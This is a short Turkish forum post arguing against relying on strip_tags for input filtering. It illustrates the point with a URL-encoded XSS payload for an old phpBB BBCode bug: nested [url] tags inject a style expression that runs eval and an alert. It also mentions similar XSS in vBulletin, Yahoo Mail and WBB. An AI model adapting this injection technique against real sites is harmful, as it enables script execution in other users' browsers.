niye strip_tags kullanıp çirkin ve güvensiz 1 data oluşturalım regular expression ı iyi biliyorsan ve aldığın variable ları html taglarının dışına taşirmiyacak şekilde filtrelersen ne güzel eski 1 phpbb bug u gösteriim

%5Burl%5Dwww.%5Burl%3Dwww.s%3D%27%27style%3D%27top%3Aexpression%28eval%28this.sss%29%29%3B%27sss%3D%60alert%28%27lol%27%29%3Bthis.sss%3Dnull%60s%3D%27%5D%5B/url%5D%5B/url%5D%27

kodu javascript:unescape(""); yaparak direk browserda decode edin çünkü forum otomatik işlior tagları

şu an vb nin son sürümlerinde 1 bbcode da xss wardı galiba bakmiorum uzun zamandır
bi de yahoo mail de war o da bbcode ta wbb de de bulmuştuk falan filan bıraktık artık